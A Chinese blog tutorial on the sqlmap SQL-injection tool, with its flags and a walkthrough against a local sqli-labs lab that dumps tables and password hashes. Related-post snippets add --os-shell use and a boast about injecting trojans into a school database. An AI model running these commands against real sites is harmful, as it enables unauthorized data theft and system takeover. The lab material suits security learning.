sqlmap

已于 2023-11-21 17:21:55 修改
阅读量1.1k 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: sql 学习 数据库
于 2023-05-18 17:15:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2202_75317918/article/details/130741036

1、Sqlmap简介:

Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。

目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。

2、Sqlmap支持的注入方式:

Sqlmap全面支持六种SQL注入技术:

    基于布尔类型的盲注:即可以根据返回页面判断条件真假的注入。

    基于时间的盲注:即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断。

    基于报错注入:即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中。

    联合查询注入:在可以使用Union的情况下的注入。

    堆查询注入:可以同时执行多条语句时的注入。

    带外注入:构造SQL语句,这些语句在呈现给数据库时会触发数据库系统创建与攻击者控制的外部服务器的连接。以这种方式,攻击者可以收集数据或可能控制数据库的行为。

3.sqlmap基础使用

参数

 -- dbs                 显示所有数据库名称
 -D (数据库名)          选则数据库
 --tables               显示所有的表
 -T (表名)             选择表
 --columns              显示所有的字段
 -C (字段名)            选择字段
 --dump                 显示字段内容

1、判断是否存在注入

sqlmap.py -u url

(如果注入点后面的参数大于等于两个,需要加双引号)
2、判断文本中的请求是否存在注入

Sqlmap.py -r desktop/1.txt

一般在存在cookies注入的情况下使用

3、查询当前用户下的所有数据库

sqlmap.py -u url --dbs

确定网站存在注入后,用于查询当前用户下的所有数据库。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有相关数据库。
4、获取数据库中的表名

sqlmap.py -u “url” -D dkeye(具体数据库) --tables

如果不加入-D来指定某一个数据库,那么会列出数据库中的所有的表。继续注入时缩写成—T,在某表中继续查询
5、获取表中的字段名

sqlmap.py -u “url” -D dkeye -T user_info(具体表名) --columns

查询完表名后,查询该表中的字段名,在后续的注入中,—columns缩写成-C
6、获取字段内容

sqlmap.py -u “url” -D dkeye -T user_info(具体表名) -C usrname password(具体字段) --dump

7、获取数据库所有用户

sqlmap.py -u url --users

列出数据库所有用户,如果当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。
8、获取数据库用户的密码

sqlmap.py -u url --passwords

如果当前用户有读取包含用户密码的权限,sqlmap会先例举出用户,然后列出hash,并尝试破解。
9、获取当前网站数据库的名称

sqlmap.py -u url --curerent-db

使用该命令可以列出当前网站使用的数据库
10、获取当前网站数据库的用户名称

sqlmap.py -u url --current-user

使用该命令可以列出当前网站使用的数据库用户

4.操作

Less-1为例

1.判断是否存在注入:

假设目标注入点是 http://127.0.0.1/sqli-labs/Less-1/?id=1,判断其是否存在注入的命令如下:

sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1

2.查看数据库名称

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --dbs

当继续注入时,--dbs缩写成-D xxx,其意思是在xxx数据库中继续查询其他数据。

 3.获取表名

列出了6个数据库名称,看到有一个 security的数据库,看看它有什么表。用 -D 选择数据库 security。再用 --tables 参数显示所有表名。

sqlmap.py -u http://127.0.0.1/sqlis/Less-1/?id=1 -D ctftraining --tables

当继续注入时,--tables缩写成-T,意思是在某表中继续查询

 4。获取字段名

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 -D security -T users --columns

 在后续的注入中,--columns缩写成-C

5.获取字段内容

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 -D security -T users --dump

 6.获取数据库的所有用户

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --users

 7.获取数据库用户的密码:

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --passwords

 密码使用了MySQL5加密,可在网站中自行解密(自带的解密很慢)。

8、获取当前网站数据库的名称:

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --current-db

使用该命令可以列出当前网站使用的数据库

 可以看到数据库是security。

9.获取当前网站数据库的用户名称:

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --current-user

使用该命令可以列出当前网站使用的数据库用户

用户是root。

木…
关注
Sqlmap是什么以及使用方法
qq_59923059的博客
03-31 1万+
前言: Sqlmap是每个渗透测试工程师必备的工具. 一、Sqlmap是什么? 在这个数据无价的时代数据库安全已经成为了重中之重,于是就整理了一下最常用的参数(在我上学的时候学校的数据库天天被我注入php木马.)数据库安全方面的渗透测试工具sqlmap的使用. sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,sqlmap供了很多脚本.但在实践测试的时候基本用不上.sqlmap是使用python开发的.有能力的可以自己编写脚本. sqlmap支持MyS
sqlmap工具
07-28
sqlmap是自动进行SQL注入检测的一个很好的工具,可以检测注入点,然后分析SQL注入
sqlmap
m0_51822230的博客
05-17 4886
mysql 一.os-shell 建立os-shell前条件: ①必须要有dba限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
SQL注入——Sqlmap工具使用
最新发布
2402_84408069的博客
05-19 1243
Sqlmap是一款基于Python开发的开源渗透测试工具,主要用于自动化检测和利用SQL注入漏洞,从而获取数据库服务器的限。它支持多种数据库类型,能够数据库中的数据、访问操作系统文件,甚至通过外带数据连接执行操作系统命令。使用Sqlmap前需配置Python环境,可通过官网或GitHub下载工具。基本使用方法包括进入Sqlmap目录、执行命令查看帮助信息,并通过指定URL进行注入测试。常用技巧包括GET型注入、POST型注入和HEAD头注入,支持自动化测试、获取数据库名、表名、列名及数据等操作。
利用sqlmap进行mysql的小方法(win与liunx通用)
weixin_33916256的博客
10-12 1024
文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\wam...
安全测试必备工具——SQLMap 安装及基本应用
主要分享测试的学习资源,帮助快速了解测试行业,帮助想转行、进阶、小白成长为高级测试工程师。
04-29 5828
检测SQL注入漏洞的专用工具是安全人士工具箱的必备品。Sqlmap是由python开发的用来检测与利用SQL注入漏洞的免费开源工具。它可以确定哪些参数、标头或数据元素容易受到SQL注入的影响,以及哪些类型的攻击是可能的。本文详细讲解这款神器的安装及使用。
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
Sqlmap使用手册中文版
01-13
Sqlmap是一款强大的、自动化的SQL注入工具,广泛用于渗透测试领域。它由Python编写,能够检测和利用多种类型的SQL注入漏洞,确保Web应用程序的安全性。Sqlmap支持五种不同的注入模式,包括基于布尔的盲注、基于时间...
sqlmap1.6.5新版本
07-24
Sqlmap是著名的自动化SQL注入工具,它主要用于检测和利用网站应用程序中的SQL注入漏洞。Sqlmap1.6.5是该工具的一个新版本,其更新可能包括性能升、新功能添加、已知问题修复以及对更多数据库类型的兼容性增强。在...
sqlmap图形化注入工具
01-21
为了降低sqlmap的使用难度,有人开发了sqlmap图形化注入工具,即本项目。该项目通过图形化界面简化了sqlmap的使用过程,使得没有深入学习过命令行操作的用户也能够轻松地进行SQL注入测试。通过这款图形化工具,用户...
sqlmap安装包 sqlmap资源包
09-23
sqlmap资源包 sql注入必备工具
SQLMAP工具详解
weixin_56218159的博客
06-02 1万+
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
jdbctemplate 执行多条sql_白帽推荐:可以自动检索、挖掘sql注入的神器,sqlmap入门实战
weixin_39772388的博客
11-16 167
学习web渗透的小白,必须有一份sqlmap的入门档案,收藏好,以备不时之需哈!Sqlmap介绍sqlmap是一个自动化的SQL注入工具,其主要功能就是扫描、发现并利用给定的URL的SQL注入漏洞。内置了很多绕过插件,支持的数据库是MySQL、Oracle、POStgreSQL、Microsoft SQL Server、Access、IBM DB2、SQLLite、FireBird等。注入方式介绍...
sqlmap工具说明
tlucky的博客
03-06 2190
版本:v1.4.10支持环境:windows,linux等支持语言:python设计目的:可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器实现:有强大的检测引擎,针对不同类型的数据库供多样的渗透测试功能选项,实现数据库识别、数 据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据 库指纹识别、从数据库获取数据、访问底层文件的广泛范围的交换机通过带外连接在操作系统上 执行命令。
渗透工具- SQLMap
LJH1999ZN的博客
02-13 724
一、sqlmap的介绍
SQLMap工具-1】SQLMap简介及简单应用实例
热门推荐
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
杨秀璋的专栏
07-18 1万+
这是最近学习渗透和网站攻防的文章,希望能深入地学习这部分知识,自己作为一个初学者,前一篇文章从数据库原理解读了防止SQL注入,这篇文章通过SQL MAP工具简单介绍其用法及原理,自己仍在慢慢探索网络攻防和渗透,希望文章对你有所帮助,尤其是学习网络安全的初学者,如果文章中存在错误或不足之处,还请海涵~
Sqlmap使用及
qq_43757105的博客
10-16 1万+
目录 一、获取账密 ​二、Sqlmap ​ 一、获取账密 检查注入点,发现存在sql注入 --dbs 检查数据库名 --current-user 当前连接数据库的用户名 --current-db 当前连接数据库的名字 -D "数据库名" 指定目标数据库名 --tables 列出数据库中所有的表名 -T "cms_...
Sqlmap
04-01
### SQLMap 工具简介 SQLMap 是一款开源的自动化 SQL 注入工具,支持多种类型的数据库以及各种注入方式。它能够检测并利用 SQL 注入漏洞来接管数据库服务器。 #### 下载与安装 SQLMap 可以通过以下方式进行下载和安装: 1. **克隆官方仓库** 用户可以通过 Git 命令从 GitHub 上获取最新版本的 SQLMap: ```bash git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev ``` 此命令会将最新的稳定版代码拉取到本地目录 `sqlmap-dev` 中[^1]。 2. **依赖环境配置** - Python 版本:SQLMap 支持 Python 2 和 Python 3,推荐使用 Python 3.x。 - 安装完成后无需额外编译即可运行。 #### 基础命令详解 以下是几个常用的 SQLMap 命令及其功能说明: 1. **判断是否存在注入点** 使用 `-u` 参数指定目标 URL 并设置风险等级为 3 来全面扫描潜在的注入点: ```bash python sqlmap.py -u "http://example.com/vuln.php?id=1" --risk=3 --level=3 ``` 2. **查看当前使用的数据库名称** 如果已确认存在注入点,则可以进一步取当前正在使用的数据库名: ```bash python sqlmap.py -u "http://example.com/vuln.php?id=1" --current-db ``` 3. **枚举所有可用数据库** 若要列举目标站点上的所有数据库列表,可执行如下命令: ```bash python sqlmap.py -u "http://example.com/vuln.php?id=1" --dbs ``` 4. **处理需要 Cookie 的场景** 当访问的目标页面受身份验证保护时,需附加相应的 Cookies 数据以便绕过认证机制继续测试: ```bash python sqlmap.py -u "http://example.com/vulnerable_page.php?id=1&Submit=Submit#" \ --cookie="PHPSESSID=some_random_session_id; security_level=low" ``` 5. **指定参数作为攻击入口** 对于复杂请求中的多个 GET/POST 参数,默认情况下只会针对第一个参数尝试注入;如果想明确指出具体哪个字段应被探测,则需要用到 `-p` 参数指明该变量的名字: ```bash python sqlmap.py -u "http://example.com/test.php?param=value" -p param ``` 以上内容涵盖了如何正确部署 SQLMap 软件包以及一些基本的操作指南[^2]^,^ [^3]. ### 注意事项 - 在实际环境中应用此类技术前,请务必获得合法授以免触犯法律; - 测试过程中产生的任何数据破坏均由使用者自行承担后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值